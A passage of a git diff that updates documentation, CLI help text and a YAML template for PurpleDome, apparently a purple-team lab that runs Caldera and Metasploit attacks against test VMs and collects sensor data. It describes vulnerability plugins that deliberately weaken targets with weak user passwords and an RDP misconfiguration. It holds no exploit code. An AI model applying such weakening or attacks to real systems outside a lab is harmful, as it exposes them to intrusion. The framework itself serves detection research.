detect and block * Or even add code to detect and block it @@ -19,7 +19,7 @@ An example plugin is in the file *hydra_plugin.py*. It contains a plugin class t Usage ===== -To create a new plugin, start a sub-folder in plugins. The python file in there must contain a class that inherits from *AttackPlugin*. +To create a new plugin, start a sub-folder in *plugins*. The python file in there must contain a class that inherits from *AttackPlugin*. There is an example plugin *hydra.py* that you can use as template. @@ -33,31 +33,17 @@ The boilerplate contains some basics: * ttp: The TTP number of this kali attack. See https://attack.mitre.org/ * references. A list of urls to blog posts or similar describing the attack * required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init. +Better than using required_files is to use: +* required_files_attacker: required files to send to the attacker +* required_files_target: required files to send to the target -Method: process_config ----------------------- - -This class processes the plugin specific configuration. The *config* parameter will contain the plugin specific part of the yaml config file. You job will be to parse it, offer sane defaults and store the parsed config in *self.conf[]*. - -Method: command ---------------- - -Creates a command that can be run on the kali machine as command. Parameters and configs you can use: - -* targets: a list of ip addresses of potential targets -* config: special config for this call -* self.sysconf: global plugin configuration. Like the path to the kali share (internal or external) -* self.conf: The configuration you created in the *process_config* method Method: run ----------- -This will run the command line created by the method *command* on the kali attacker. - -Configuration -------------- +This will run the attack. -If you are using the plugin, you **must** have a config section for this kali plugin in the configuration. Even if it is empty. +* targets: a list of target machines. If you need the network address, use target[0].get_ip() The plugin class ================ diff --git a/doc/source/extending/documentation.rst b/doc/source/extending/documentation.rst index 96a276a..74cd717 100644 --- a/doc/source/extending/documentation.rst +++ b/doc/source/extending/documentation.rst @@ -2,7 +2,7 @@ Extending the documentation =========================== -Tools being used are: +Tools being used for documentation are: * Argparse for my command line tools @@ -19,4 +19,8 @@ Tools being used are: * Autoyaml - - https://github.com/Jakski/sphinxcontrib-autoyaml \ No newline at end of file + - https://github.com/Jakski/sphinxcontrib-autoyaml + +* Asciinema + + - https://pypi.org/project/sphinxcontrib.asciinema/ \ No newline at end of file diff --git a/doc/source/extending/extending.rst b/doc/source/extending/extending.rst index 8bc7182..73cbec2 100644 --- a/doc/source/extending/extending.rst +++ b/doc/source/extending/extending.rst @@ -8,13 +8,13 @@ Modules Several core module create the system. * CalderaControl: remote control for Caldera using the Caldera REST API +* Metasploit: Metasploit control * MachineControl: Create/start and stop VMs * ExperimentControl: Control experiments. Will internally use the modules already mentioned +* PluginManager: Plugin manager tasks +* MachineConfig / ExperimentConfig: Reading and processing configuration files +* AttackLog: Logging attack steps and output to stdio -.. sidebar:: Plugins - - There will be a plugin system soon. Until then the only way to extend - PurpleDome is to modify the core source code. If it is not urgent, maybe better be patient and ask for a specific plugin interface. -------------- CalderaControl @@ -25,6 +25,24 @@ Class for Caldera communication .. autoclass:: app.calderacontrol.CalderaControl :members: +---------- +MetaSploit +---------- + +Class for Metasploit automation + +.. autoclass:: app.metasploit.Metasploit + :members: + +-------- +MSFVenom +-------- + +Class for MSFVenom automation + +.. autoclass:: app.metasploit.MSFVenom + :members: + -------------- MachineControl -------------- @@ -54,3 +72,21 @@ Internal configuration handling. Currently there are two classes. One for the wh .. autoclass:: app.config.MachineConfig :members: + +------------- +PluginManager +------------- + +Managing plugins + +.. autoclass:: app.pluginmanager.PluginManager + :members: + +--------- +AttackLog +--------- + +Attack specific logging + +.. autoclass:: app.attack_log.AttackLog + :members: \ No newline at end of file diff --git a/doc/source/extending/sensor_plugins.rst b/doc/source/extending/sensor_plugins.rst index 76b7a62..ec26efd 100644 --- a/doc/source/extending/sensor_plugins.rst +++ b/doc/source/extending/sensor_plugins.rst @@ -9,19 +9,13 @@ Usage To create a new plugin, start a sub-folder in plugins. The python file in there must contain a class that inherits from *SensorPlugin*. -If the plugin is activated for a specific machine four specific methods will be called to interact with the target: +If the plugin is activated for a specific machine specific methods will be called to interact with the target: -* Install -* Start -* Stop -* Collect results - -Methods for these four are called by PurpleDome. Normally you should not have to edit these methods. Just the commands you that are called by them. And those commands are created by specific methods: - -* install_command -* start_command -* stop_command -* collect_command +* prime: Easrly installation steps, can trigger a reboot of the machine by returning True +* install: Normal, simple installation. No reboot +* start: Start the sensor +* stop: Stop the sensor +* collect: Collect results Boilerplate ----------- diff --git a/doc/source/extending/vm_controller_plugins.rst b/doc/source/extending/vm_controller_plugins.rst index aa569be..237e98b 100644 --- a/doc/source/extending/vm_controller_plugins.rst +++ b/doc/source/extending/vm_controller_plugins.rst @@ -8,8 +8,11 @@ A VM plugin handles several things: * vm creation/destruction * vm starting/stopping -* connecting to the VM (ssh or similar) and running commands there -* Copy files from and to the VM + +VM controller plugins can use SSH as a mixin class. This is implemented in *ssh_features.py* and reduces code duplication. In certain cases (for example if SSH needs some extra features) you can extend or replace methods from there. SSH handles: + +* connecting to the VM and running commands there +* Copying files from and to the VM @@ -29,68 +32,28 @@ The boilerplate contains some basics: * description. A human readable description for this plugin. * required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init. -Method: process_config ----------------------- - -The configuration for this machine is a sub-section in the experiment config. As the different machinery systems might require special handling, you can parse the config in this section and add your own processing or defaults +Some relevant methods are -Method: create +process_config -------------- -Creates the machine (for systems like vagrant that build a machine out of a config file) - -Method: up ----------- - -Starts the machine - -Method: halt ------------- - -Stops the machine - -Method: destroy ---------------- - -Remove the machine from disk. Only smart if you can re-create it with *create* - -Method: connect ---------------- - -Create a connection to this machine to run shell commands or copy files - -Method: remote_run ------------------- - -Execute a command on the running machine - -Method: put ------------ - -Copy a file to the machine - -Method: get ------------ - -Get a file from the machine - -Method: disconnect ------------------- - -Disconnect the command channel from the vm +The configuration for this machine is a sub-section in the experiment config. As the different machinery systems might require special handling, you can parse the config in this section and add your own processing or defaults -Method: get_state ------------------ +get_state +--------- Get the machines state. The class MachineStates contains potential return values -Method: get_ip --------------- +get_ip +------ Get the ip of the machine. If the machine is registered at the system resolver (/etc/hosts, dns, ...) a machine name would also be a valid response. As long as the network layer can reach it, everything is fine. The plugin class ================ +The machine class can also be very essential if you write attack plugins. Those have access to the kali attack and one or more targets. And those are Machinery objects. +For a full list of methods read on: + .. autoclass:: plugins.base.machinery.MachineryPlugin :members: \ No newline at end of file diff --git a/doc/source/extending/vulnerability_plugins.rst b/doc/source/extending/vulnerability_plugins.rst index 960a6d6..441a52b 100644 --- a/doc/source/extending/vulnerability_plugins.rst +++ b/doc/source/extending/vulnerability_plugins.rst @@ -2,9 +2,9 @@ Vulnerability plugins ********************* -To leave attack traces on a machine it should be vulnerable. Services should run. Old application be installed, users with weak passwords added. The configuration should be a mess. +To leave attack traces on a machine it should be vulnerable. Services should run. Old application be installed, users with weak passwords added to the system. You get the idea. -This plugin type allows you to punch some holes into the protection of a machine. Which plugins are loaded for a specific target is defined in the configuration file. +This plugin type allows you to punch some holes into the protection of a machine. Which vulnerability plugins are loaded for a specific target is defined in the configuration file. Feel free to weaken the defenses. Usage ===== @@ -20,25 +20,25 @@ The boilerplate contains some basics: * name: a unique name, also used in the config yaml file to reference this plugin * description: A human readable description for this plugin. -* ttp: The TTP number of this kali attack. See https://attack.mitre.org/ Just as a hint which TTP this vulnerability could be realted to -* references. A list of urls to blog posts or similar describing the attack +* ttp: The TTP number of this kali attack. See https://attack.mitre.org/ Just as a hint which TTP this vulnerability could be related to +* references: A list of urls to blog posts or similar describing the attack * required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init. +Method: install (optional) +-------------------------- + +*start* installs the vulnerability on the target. *install* is called before that. If you have to setup anything in the plugin space (and not on the target) do it here. + Method: start ------------- -Put the code in here that adds vulnerabilities to the machine. The most important method you can use here is "self.run_cmd" and execute a shell command. +Adds the vulnerability to the machine. The most important method you can use here is "self.run_cmd" and execute a shell command. Method: stop ------------ Undo the changes after the attacks ran. If the machine is re-used (and not re-built or run from a snapshot) this will make it simpler for the user to run more experiments on slightly modified systems. -Method: install (optional) --------------------------- - -*start* installs the vulnerability on the target. *install* is called before that. If you have to setup anything in the plugin space (and not on the target) do it here. - The plugin class ================ diff --git a/doc/source/index.rst b/doc/source/index.rst index abc87fb..be0bcc8 100644 --- a/doc/source/index.rst +++ b/doc/source/index.rst @@ -17,14 +17,12 @@ Welcome to the Purple Dome documentation! basics/background + usage/cli + basics/configuration basics/windows_targets - usage/usage - - usage/cli - extending/vulnerability_plugins extending/attack_plugins diff --git a/doc/source/usage/cli.rst b/doc/source/usage/cli.rst index 832e205..407de01 100644 --- a/doc/source/usage/cli.rst +++ b/doc/source/usage/cli.rst @@ -19,22 +19,33 @@ Experiment control is the core tool to run an experiment. It accepts a yaml conf :func: create_parser :prog: ./experiment_control.py -Machine control -=============== +Plugin manager +============== -Directly control the machines +List available plugins or a specific plugin config .. argparse:: - :filename: ../machine_control.py + :filename: ../plugin_manager.py :func: create_parser - :prog: ./machine_control.py + :prog: ./plugin_manager.py Caldera control =============== -Directly control a caldera server +Directly control a caldera server. You will need a running caldera server to connect to. This plugin is handy to list available attacks and find the attack IDs matching specific TTP-IDs. .. argparse:: :filename: ../caldera_control.py :func: create_parser - :prog: ./caldera_control.py \ No newline at end of file + :prog: ./caldera_control.py + +Machine control +=============== + +Directly control the machines + +.. argparse:: + :filename: ../machine_control.py + :func: create_parser + :prog: ./machine_control.py + diff --git a/experiment_control.py b/experiment_control.py index f4779a4..51c27ca 100644 --- a/experiment_control.py +++ b/experiment_control.py @@ -46,9 +46,9 @@ def create_parser(): # Sub parser for machine creation parser_run = subparsers.add_parser("run", help="run experiments") parser_run.set_defaults(func=run) - parser_run.add_argument("--configfile", default="experiment.yaml", help="Config file to create from") - parser_run.add_argument("--caldera_attack", default=None, help="The id of a specific caldera attack to run") - parser_run.add_argument("--caldera_attack_file", default=None, help="The file name containing a list of caldera attacks to run") + parser_run.add_argument("--configfile", default="experiment.yaml", help="Config file to create the experiment from") + parser_run.add_argument("--caldera_attack", default=None, help="The id of a specific caldera attack to run, will override experiment configuration for attacks") + parser_run.add_argument("--caldera_attack_file", default=None, help="The file name containing a list of caldera attacks to run, will override experiment configuration for attacks") return parser diff --git a/plugins/base/machinery.py b/plugins/base/machinery.py index 060ab25..5252e84 100644 --- a/plugins/base/machinery.py +++ b/plugins/base/machinery.py @@ -105,12 +105,12 @@ class MachineryPlugin(BasePlugin): raise NotImplementedError def get_playground(self): - """ path where all the attack tools will be copied to on a client. Your specific machine plugin can overwrite it. """ + """ Path on the machine where all the attack tools will be copied to. """ return self.config.get_playground() def get_vm_name(self): - """ Get the name of the machine """ + """ Get the specific name of the machine """ return self.config.vmname() @@ -122,7 +122,7 @@ class MachineryPlugin(BasePlugin): raise NotImplementedError def get_machine_path_external(self): - """ The path external to the vm where specific data is stored """ + """ The path on the controlling host where vm specific data is stored """ return os.path.join(self.config.vagrantfilepath(), self.config.machinepath()) ############### diff --git a/template.yaml b/template.yaml index 2ab41e0..f9237cf 100644 --- a/template.yaml +++ b/template.yaml @@ -89,14 +89,17 @@ targets: vm_name: target2 os: windows paw: target2w + ### # Targets need to be in a group for caldera. The group is more relevant than the paw. Better put every target in a unique group - group: red + group: red_windows machinepath: target2w + ### # Do not destroy/create the machine: Set this to "yes". use_existing_machine: yes + ### # Optional setting to activate force when halting the machine. Windows guests sometime get stuck halt_needs_force: yes @@ -118,10 +121,13 @@ targets: # Windows can only use default playground at the moment ! # playground: C:\\Users\\PurpleDome + ### # Sensors to run on this machine sensors: - windows_idp + ### + # Vulnerabilities to pre-install vulnerabilities: - weak_user_passwords - rdp_config_vul